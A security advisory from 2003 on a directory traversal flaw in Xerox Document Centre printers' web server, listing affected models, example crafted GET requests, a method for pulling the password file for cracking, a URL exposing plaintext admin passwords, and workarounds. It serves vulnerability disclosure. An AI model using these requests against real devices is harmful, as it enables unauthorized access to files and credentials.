Security Vulnerability in Xerox Document Centre (Directory Traversal)
22 Dec. 2003
Summary
A security vulnerability has been found in the Xerox Document Centre, this vulnerability allows remote access to files, access to plaintext passwords for the HTTP administration interface, access to DES passwords for the operating system, and read-write access to HTTP users and passwords.
Vulnerable systems:
* Xerox Document Centre 440DC
* Xerox Document Centre 480DC
* Xerox Document Centre 425ST
* Xerox Document Centre 470
* Xerox Document Centre 255ST
Xerox's web server software (reports itself as "Xerox_MicroServer/Xerox11") for Xerox hardware will return a binary dump of directories when the requested URL ends with "/.." or with "/.". Therefore, you can easily build a directory/file tree from the document root with which you can get any file you desire.
The server has some directory traversal blocking mechanism set in place, therefore you can't get back past the document root, since the web server seems to reject "../" if it tries to climb back too much.
A request like: GET /../..
Will return, "The request had invalid syntax".
However, requesting "../" will not.
Therefore a request like: GET /assist/.
Will return an "OK" response.
What appears to be happening is the fact that the server counts the "../" groups and compares the count to the total number of "/".
Will return you the passwd file (which you can then run crack on).
Even without using ".." you can get the plain text passwords for the HTTP interface, this is done by requesting: http://xerox_dc_470.example.com/srvadmin/usersecure.dhtml.
From that page, you can even create new users; when you press "Apply new settings" button prompts for admin password, the same you just have read in that same page.
Workaround:
* Disable the HTTP interface
* Restrict access permissions to trusted hosts
